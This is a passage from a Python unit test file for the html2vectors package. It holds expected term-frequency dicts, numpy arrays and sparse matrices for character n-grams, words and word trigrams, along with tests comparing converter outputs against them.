'2TF': 1, 'ase': 1, 'htm': 2, '/mo': 1, 'TF ': 1, '.ch': 1, ' un': 1, '2tf': 1, 'l2t': 1,\
'l2v': 1, 'eSt': 1, 'ing': 1, 'ge/': 1, 'ams': 1, 'or ': 2, 'cha': 1, 'est': 1, 'Str': 1,\
'for': 2, ' is': 1, 'cla': 1, 'e/m': 1, 'fd.': 1, 'ml2': 2, 'pac': 1, 'arn': 1, 'ngr': 1,\
'gra': 1, 'har': 1, 'is ': 2, 'F c': 1, 'ass': 1, 'g2T': 1, 'his': 1, 'kag': 1, 'Bas': 1,\
'2ve': 1, 'ors': 1, 'it ': 1, 'odu': 1, 'mod': 1, ' pa': 1, 'ect': 1, 'Thi': 1, 'dul': 1,\
' te': 1, '.Ba': 1, 'nit': 1, 'las': 1, ' a ': 1, 'cka': 1, ' cl': 1, 'd.c': 1, 'ack': 1,\
'age': 1, ' ht': 2, 'ms.': 1, 'ng2': 1, 'cto': 1, ' fo': 2, 'a u': 1
}
self.expected_words_tf_dict = {
'a': 1, 'for': 2, 'This': 1, 'is': 1, 'html2vectors': 1, 'test': 1,\
'package/module': 1, 'html2tfd.charngrams.BaseString2TF': 1, 'class': 1, 'unit': 1
}
self.expected_words_tf_dict_smallVocab = {
'a': 1, 'for': 2, 'This': 1, 'is': 1, 'html2vectors': 1, 'test': 1,\
'package/module': 1\
}
self.expected_w3grams_tf_dict = {
'This is a' : 1, 'unit test for' : 1, 'html2tfd.charngrams.BaseString2TF class for' : 1,\
'is a unit' : 1, 'test for html2tfd.charngrams.BaseString2TF' : 1, 'class for html2vectors' : 1,\
'a unit test' : 1, 'for html2tfd.charngrams.BaseString2TF class' : 1, 'for html2vectors package/module' : 1\
}
self.expected_w3grams_tf_dict_smallVocab = {
'This is a' : 1, 'unit test for' : 1, 'html2tfd.charngrams.BaseString2TF class for' : 1,\
'is a unit' : 1, 'test for html2tfd.charngrams.BaseString2TF' : 1\
}
#Terms-Frequencies numpy.arrays
self.expected_c3grams_tf_arr = np.array( [
(' a ', 1.0), (' cl', 1.0), (' fo', 2.0), (' ht', 2.0), (' is', 1.0),\
(' pa', 1.0), (' te', 1.0), (' un', 1.0), ('.Ba', 1.0), ('.ch', 1.0),\
('/mo', 1.0), ('2TF', 1.0), ('2tf', 1.0), ('2ve', 1.0), ('Bas', 1.0),\
('F c', 1.0), ('Str', 1.0), ('TF ', 1.0), ('Thi', 1.0), ('a u', 1.0),\
('ack', 1.0), ('age', 1.0), ('ams', 1.0), ('arn', 1.0), ('ase', 1.0),\
('ass', 1.0), ('cha', 1.0), ('cka', 1.0), ('cla', 1.0), ('cto', 1.0),\
('d.c', 1.0), ('dul', 1.0), ('e/m', 1.0), ('eSt', 1.0), ('ect', 1.0),\
('est', 1.0), ('fd.', 1.0), ('for', 2.0), ('g2T', 1.0), ('ge/', 1.0),\
('gra', 1.0), ('har', 1.0), ('his', 1.0), ('htm', 2.0), ('ing', 1.0),\
('is ', 2.0), ('it ', 1.0), ('kag', 1.0), ('l2t', 1.0), ('l2v', 1.0),\
('las', 1.0), ('ml2', 2.0), ('mod', 1.0), ('ms.', 1.0), ('ng2', 1.0),\
('ngr', 1.0), ('nit', 1.0), ('odu', 1.0), ('or ', 2.0), ('ors', 1.0),\
('pac', 1.0), ('r h', 2.0), ('ram', 1.0), ('rin', 1.0), ('rng', 1.0),\
('rs ', 1.0), ('s a', 1.0), ('s f', 1.0), ('s i', 1.0), ('s p', 1.0),\
('s.B', 1.0), ('seS', 1.0), ('ss ', 1.0), ('st ', 1.0), ('t f', 1.0),\
('t t', 1.0), ('tes', 1.0), ('tfd', 1.0), ('tml', 2.0), ('tor', 1.0),\
('tri', 1.0), ('ule', 1.0), ('uni', 1), ('vec', 1)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_c3grams_tf_arr_Vocab = np.array( [
('s i', 1.0), ('t t', 1.0), ('ase', 1.0), ('s a', 1.0), ('htm', 2.0),\
('ram', 1.0), ('rs ', 1.0), ('TF ', 1.0), ('s f', 1.0), ('.ch', 1.0),\
('t f', 1.0), (' un', 1.0), ('2tf', 1.0), ('l2t', 1.0), ('l2v', 1.0),\
('s p', 1.0), ('eSt', 1.0), ('tes', 1.0), ('ge/', 1.0), ('ams', 1.0),\
('or ', 2.0), ('cha', 1.0), ('est', 1.0), ('st ', 1.0), ('Str', 1.0),\
('for', 2.0), ('tor', 1.0), (' is', 1.0), ('ing', 1.0), ('cla', 1.0),\
('e/m', 1.0), ('fd.', 1.0), ('ml2', 2.0), ('pac', 1.0), ('arn', 1.0),\
('ngr', 1.0), ('r h', 2.0), ('2TF', 1.0), ('har', 1.0), ('is ', 2.0),\
('tml', 2.0), ('F c', 1.0), ('ass', 1.0), ('tri', 1.0), ('g2T', 1.0),\
('his', 1.0), ('kag', 1.0), ('Bas', 1.0), ('2ve', 1.0), ('tfd', 1.0),\
('gra', 1.0), ('rng', 1.0), ('ors', 1.0), ('it ', 1.0), ('odu', 1.0),\
('mod', 1.0), (' pa', 1.0), ('ect', 1.0), ('ule', 1.0), ('Thi', 1.0),\
('s.B', 1.0), (' te', 1.0), ('.Ba', 1.0), ('nit', 1.0), ('las', 1.0),\
(' a ', 1.0), ('rin', 1.0), ('seS', 1.0), ('cka', 1.0), (' cl', 1.0),\
('d.c', 1.0), ('dul', 1.0), ('ack', 1.0), ('age', 1.0), (' ht', 2.0),\
('ms.', 1.0), ('/mo', 1.0), ('ng2', 1.0), ('ss ', 1.0), ('uni', 1.0),\
('cto', 1.0), ('vec', 1.0), (' fo', 2.0), ('a u', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_c3grams_tf_arr_smallVocab = np.array( [
('2TF', 1.0), ('ase', 1.0), ('htm', 2.0), ('/mo', 1.0), ('TF ', 1.0),\
('.ch', 1.0), (' un', 1.0), ('2tf', 1.0), ('l2t', 1.0), ('l2v', 1.0),\
('eSt', 1.0), ('ing', 1.0), ('ge/', 1.0), ('ams', 1.0), ('or ', 2.0),\
('cha', 1.0), ('est', 1.0), ('Str', 1.0), ('for', 2.0), (' is', 1.0),\
('cla', 1.0), ('e/m', 1.0), ('fd.', 1.0), ('ml2', 2.0), ('pac', 1.0),\
('arn', 1.0), ('ngr', 1.0), ('gra', 1.0), ('har', 1.0), ('is ', 2.0),\
('F c', 1.0), ('ass', 1.0), ('g2T', 1.0), ('his', 1.0), ('kag', 1.0),\
('Bas', 1.0), ('2ve', 1.0), ('ors', 1.0), ('it ', 1.0), ('odu', 1.0),\
('mod', 1.0), (' pa', 1.0), ('ect', 1.0), ('Thi', 1.0), ('dul', 1.0),\
(' te', 1.0), ('.Ba', 1.0), ('nit', 1.0), ('las', 1.0), (' a ', 1.0),\
('cka', 1.0), (' cl', 1.0), ('d.c', 1.0), ('ack', 1.0), ('age', 1.0),\
(' ht', 2.0), ('ms.', 1.0), ('ng2', 1.0), ('cto', 1.0), (' fo', 2.0),\
('a u', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_words_tf_arr = np.array( [
('This', 1.0), ('a', 1.0), ('class', 1.0), ('for', 2.0),\
('html2tfd.charngrams.BaseString2TF', 1.0), ('html2vectors', 1.0),\
('is', 1.0), ('package/module', 1.0), ('test', 1.0), ('unit', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_words_tf_arr_Vocab = np.array( [
('a', 1.0), ('for', 2.0), ('This', 1.0), ('is', 1.0), ('html2vectors', 1.0),\
('test', 1.0), ('package/module', 1.0), ('html2tfd.charngrams.BaseString2TF', 1.0),\
('class', 1.0), ('unit', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_words_tf_arr_smallVocab = np.array( [
('a', 1.0), ('for', 2.0), ('This', 1.0), ('is', 1.0), ('html2vectors', 1.0),\
('test', 1.0), ('package/module', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_w3grams_tf_arr = np.array( [
('This is a', 1.0), ('a unit test', 1.0), ('class for html2vectors', 1.0),\
('for html2tfd.charngrams.BaseString2TF class', 1.0), ('for html2vectors package/module', 1.0),\
('html2tfd.charngrams.BaseString2TF class for', 1.0), ('is a unit', 1.0),\
('test for html2tfd.charngrams.BaseString2TF', 1.0), ('unit test for', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_w3grams_tf_arr_Vocab = np.array( [
('a unit test', 1.0), ('html2tfd.charngrams.BaseString2TF class for', 1.0),\
('test for html2tfd.charngrams.BaseString2TF', 1.0), ('class for html2vectors', 1.0),\
('for html2tfd.charngrams.BaseString2TF class', 1.0), ('is a unit', 1.0),\
('for html2vectors package/module', 1.0), ('This is a', 1.0), ('unit test for', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_w3grams_tf_arr_smallVocab = np.array( [
('is a unit', 1.0), ('test for html2tfd.charngrams.BaseString2TF', 1.0), ('unit test for', 1.0),\
('This is a', 1.0), ('html2tfd.charngrams.BaseString2TF class for', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
#Frequencies scipy.sparse matrices
self.expected_c3grams_f_sparse_NoVocab = ssp.csr_matrix(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0\
],\
(np.zeros(84), np.arange(84))
),\
dtype=np.float32\
)
self.expected_c3grams_f_sparse_largeVocab = ssp.csr_matrix(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\
],\
(np.zeros(96), np.arange(96))
),\
dtype=np.float32\
)
self.expected_c3grams_f_sparse_smallVocab = ssp.csr_matrix(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0,\
],\
(np.zeros(61), np.arange(61))
),\
dtype=np.float32\
)
self.expected_words_f_sparse_Vocab = ssp.csr_matrix(
([ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
(np.zeros(11), np.arange(11))\
), dtype=np.float32\
)
self.expected_words_f_sparse_smallVocab = ssp.csr_matrix(
([ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
(np.zeros(8), np.arange(8))\
), dtype=np.float32\
)
self.expected_words_f_sparse_largeVocab = ssp.csr_matrix(
([ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0 ],\
(np.zeros(15), np.arange(15))\
), dtype=np.float32\
)
self.expected_w3grams_f_sparse_Vocab = ssp.csr_matrix(
([ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
(np.zeros(10), np.arange(10))\
), dtype=np.float32\
)
self.expected_w3grams_f_sparse_smallVocab = ssp.csr_matrix(
([ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
(np.zeros(6), np.arange(6))\
), dtype=np.float32\
)
self.expected_w3grams_f_sparse_largeVocab = ssp.csr_matrix(
([ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0 ],\
(np.zeros(13), np.arange(13))\
), dtype=np.float32\
)
#Frequencies numpy.arrays matrices
self.expected_c3grams_f_narray_Vocab = np.array(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0\
]),\
dtype=np.float32\
)
self.expected_c3grams_f_narray_largeVocab = np.array(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\
]),\
dtype=np.float32\
)
self.expected_c3grams_f_narray_smallVocab = np.array(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0,\
]),\
dtype=np.float32\
)
self.expected_words_f_narray_Vocab = np.array(
[ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
dtype=np.float32\
)
self.expected_words_f_narray_smallVocab = np.array(
[ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
dtype=np.float32\
)
self.expected_words_f_narray_largeVocab = np.array(
[ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0 ],\
dtype=np.float32\
)
self.expected_w3grams_f_narray_Vocab = np.array(
[ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
dtype=np.float32\
)
self.expected_w3grams_f_narray_smallVocab = np.array(
[ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
dtype=np.float32\
)
self.expected_w3grams_f_narray_largeVocab = np.array(
[ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0 ],\
dtype=np.float32\
)
"""trms2tf_dict()"""
def test_trms2tf_dict_c3grams_NoVocab(self):
    """Character-3-grams terms-list converted to a TF dict with no vocabulary.

    Expects the result to equal the reference dict built in setUp.
    """
    # NOTE(review): sibling (disabled) tests call trms2tf_dict; trms2tfspd_dict
    # here may be a deliberate sparse-dict variant — confirm against the module
    # under test.
    cngrams_tf_dict = trms2tfspd_dict(self.s2ngl_c3grams.terms_lst(self.txt_sample), vocabulary=None)
    # Use the print() call form: identical output under Python 2 for a single
    # argument, and valid under Python 3 (the bare `print x` statement is not).
    print(cngrams_tf_dict)
    self.assertEqual(cngrams_tf_dict, self.expected_c3grams_tf_dict)
"""
def test_trms2tf_dict_c3grams_Vocab(self):
cngrams_tf_dict = trms2tf_dict( self.s2ngl_c3grams.terms_lst( self.txt_sample ), vocabulary=self.c3grams_tid_vocab )
self.assertEqual(cngrams_tf_dict, self.expected_c3grams_tf_dict)
def test_trms2tf_dict_c3grams_smallVocab(self):
cngrams_tf_dict = trms2tf_dict( self.s2ngl_c3grams.terms_lst( self.txt_sample ), vocabulary=self.c3grams_tid_vocab_small )
self.assertEqual(cngrams_tf_dict, self.expected_c3grams_tf_dict_smallVocab)
def test_trms2tf_dict_c3grams_largeVocab(self):
cngrams_tf_dict = trms2tf_dict( self.s2ngl_c3grams.terms_lst( self.txt_sample ), vocabulary=self.c3grams_tid_vocab_large )
self.assertEqual(cngrams_tf_dict, self.expected_c3grams_tf_dict)
def test_trms2tf_dict_words_NoVocab(self):
words_tf_dict = trms2tf_dict( self.s2ngl_words.terms_lst( self.txt_sample ), vocabulary=None )
#Output excpected to be the same as in case of an input Vocabulary having same size (in terms) to the input terms-list.
self.assertEqual(words_tf_dict, self.expected_words_tf_dict)
def test_trms2tf_dict_words_Vocab(self):
cngrams_tf_dict = trms2tf_dict( self.s2ngl_words.terms_lst( self.txt_sample ), vocabulary=self.words_tid_vocab )
self.assertEqual(cngrams_tf_dict, self.expected_words_tf_dict)
def test_trms2tf_dict_words_smallVocab(self):
words_tf_dict = trms2tf_dict( self.s2ngl_words.terms_lst( self.txt_sample ), vocabulary=self.words_tid_vocab_small )
#Output excpected to be the smaller that the _Vocabe case since input Vocabulary has smaller size (in terms) than terms-list.
self.assertEqual(words_tf_dict, self.expected_words_tf_dict_smallVocab)
def test_trms2tf_dict_words_largeVocab(self):
words_tf_dict = trms2tf_dict( self.s2ngl_words.terms_lst( self.txt_sample ), vocabulary=self.words_tid_vocab_large )
#Output excpected to be the same as in case of an input Vocabulary having same size (in terms) to the input terms-list.
self.assertEqual(words_tf_dict, self.expected_words_tf_dict)
def test_trms2tf_dict_w3grams_NoVocab(self):
wngrams_tf_dict = trms2tf_dict( self.s2ngl_w3grams.terms_lst( self.txt_sample ), vocabulary=None )
#Output excpected to be the same as in case of an input Vocabulary having same size (in terms) to the input terms-list.
#Because, the input Vocabulary happess to have the same terms-order to the one returned by default in the case of 'Vocabulary = None'
self.assertEqual(wngrams_tf_dict, self.expected_w3grams_tf_dict)
def test_trms2tf_dict_w3grams_Vocab(self):
wngrams_tf_dict = trms2tf_dict( self.s2ngl_w3grams.terms_lst( self.txt_sample ), vocabulary=self.w3grams_tid_vocab )
self.assertEqual(wngrams_tf_dict, self.expected_w3grams_tf_dict)
def test_trms2tf_dict_w3grams_smallVocab(self):
wngrams_tf_dict = trms2tf_dict( self.s2ngl_w3grams.terms_lst( self.txt_sample ), vocabulary=self.w3grams_tid_vocab_small )
self.assertEqual(wngrams_tf_dict, self.expected_w3grams_tf_dict_smallVocab)
def test_trms2tf_dict_w3grams_largeVocab(self):
wngrams_tf_dict = trms2tf_dict( self.s2ngl_w3grams.terms_lst( self.txt_sample ), vocabulary=self.w3grams_tid_vocab_large )
#Output excpected to be the same as in case of an input Vocabulary having same size (in terms) to the input terms-list.
self.assertEqual(wngrams_tf_dict, self.expected_w3grams_tf_dict)
#trms2tf_narray()
def test_trms2tf_narray_c3grams_NoVocab(self):
cngrams_tf_arr = trms2tf_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
vocabulary=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(cngrams_tf_arr == self.expected_c3grams_tf_arr) )
def test_trms2tf_narray_c3grams_Vocab(self):
cngrams_tf_arr = trms2tf_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
vocabulary=self.c3grams_tid_vocab,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be the same as in case of an input Vocabulary is None.
#However, the order of terms will follow the one of input Vocabulary.
self.assertTrue( np.all(cngrams_tf_arr == self.expected_c3grams_tf_arr_Vocab) )
def test_trms2tf_narray_c3grams_smallVocab(self):
cngrams_tf_arr = trms2tf_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
vocabulary=self.c3grams_tid_vocab_small,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be smaller than input terms Vocabulary having same size (in terms) to the input terms-list.
self.assertTrue( np.all(cngrams_tf_arr == self.expected_c3grams_tf_arr_smallVocab) )
def test_trms2tf_narray_c3grams_largeVocab(self):
cngrams_tf_arr = trms2tf_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
vocabulary=self.c3grams_tid_vocab_large,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be the same as in case a Vocabulary is given, having the same terms as the ones into the terms-list.
#That is, the extra terms into the vocabulary will not be included into the output recored-array.
self.assertTrue( np.all(cngrams_tf_arr == self.expected_c3grams_tf_arr_Vocab) )
def test_trms2tf_narray_words_NoVocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr) )
def test_trms2tf_narray_words_Vocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
vocabulary=self.words_tid_vocab,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr_Vocab) )
def test_trms2tf_narray_words_smallVocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
vocabulary=self.words_tid_vocab_small,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr_smallVocab) )
def test_trms2tf_narray_words_largeVocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
vocabulary=self.words_tid_vocab_large,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be the same as in case a Vocabulary is given, having the same terms as the ones into the terms-list.
#That is, the extra terms into the vocabulary will not be included into the output recored-array.
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr_Vocab) )
def test_trms2tf_narray_w3grams_NoVocab(self):
w3grams_tf_arr = trms2tf_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(w3grams_tf_arr == self.expected_w3grams_tf_arr) )
def test_trms2tf_narray_w3grams_Vocab(self):
w3grams_tf_arr = trms2tf_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
vocabulary=self.w3grams_tid_vocab,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(w3grams_tf_arr == self.expected_w3grams_tf_arr_Vocab) )
def test_trms2tf_narray_w3grams_smallVocab(self):
w3grams_tf_arr = trms2tf_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
vocabulary=self.w3grams_tid_vocab_small,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(w3grams_tf_arr == self.expected_w3grams_tf_arr_smallVocab) )
def test_trms2tf_narray_words_largeVocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
vocabulary=self.words_tid_vocab_large,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be the same as in case a Vocabulary is given, having the same terms as the ones into the terms-list.
#That is, the extra terms into the vocabulary will not be included into the output recored-array.
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr_Vocab) )
#trms2f_sparse()
def test_trms2f_sparse_c3grams_NoVocab(self):
with self.assertRaises(ValueError):
cngrams_f_sparse = trms2f_sparse( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_sparse_c3grams_Vocab(self):
cngrams_f_sparse = trms2f_sparse( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(cngrams_f_sparse.toarray() == self.expected_c3grams_f_sparse_NoVocab.toarray()) )
def test_trms2f_sparse_c3grams_smallVocab(self):
cngrams_f_sparse = trms2f_sparse( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab_small, norm_func=None, ndtype=np.float32 )
#Output excpected to be smaller in size than the input terms-list but same in size to the input Vocabulary.
self.assertTrue( np.all(cngrams_f_sparse.toarray() == self.expected_c3grams_f_sparse_smallVocab.toarray()) )
def test_trms2f_sparse_c3grams_largeVocab(self):
cngrams_f_sparse = trms2f_sparse( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab_large, norm_func=None, ndtype=np.float32 )
#Output excpected to be larger in size than the input terms-list but same in size to the input Vocabulary.
#terms-poisition of terms not inlcuded in terms-list being setted to zero.
self.assertTrue( np.all(cngrams_f_sparse.toarray() == self.expected_c3grams_f_sparse_largeVocab.toarray()) )
def test_trms2f_sparse_words_NoVocab(self):
with self.assertRaises(ValueError):
words_f_sparse = trms2f_sparse( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_sparse_words_Vocab(self):
words_f_sparse = trms2f_sparse( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(words_f_sparse.toarray() == self.expected_words_f_sparse_Vocab.toarray()) )
def test_trms2f_sparse_words_smallVocab(self):
words_f_sparse = trms2f_sparse( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab_small, norm_func=None, ndtype=np.float32 )
#Output excpected to be smaller in size than the input terms-list but same in size to the input Vocabulary.
self.assertTrue( np.all(words_f_sparse.toarray() == self.expected_words_f_sparse_smallVocab.toarray()) )
def test_trms2f_sparse_words_largeVocab(self):
words_f_sparse = trms2f_sparse( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab_large, norm_func=None, ndtype=np.float32 )
#Output excpected to be larger in size than the input terms-list but same in size to the input Vocabulary.
#terms-poisition of terms not inlcuded in terms-list being setted to zero.
self.assertTrue( np.all(words_f_sparse.toarray() == self.expected_words_f_sparse_largeVocab.toarray()) )
def test_trms2f_sparse_w3grams_NoVocab(self):
with self.assertRaises(ValueError):
w3grams_f_sparse = trms2f_sparse( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_sparse_w3grams_Vocab(self):
w3grams_f_sparse = trms2f_sparse( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(w3grams_f_sparse.toarray() == self.expected_w3grams_f_sparse_Vocab.toarray()) )
def test_trms2f_sparse_w3grams_smallVocab(self):
w3grams_f_sparse = trms2f_sparse( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab_small, norm_func=None, ndtype=np.float32 )
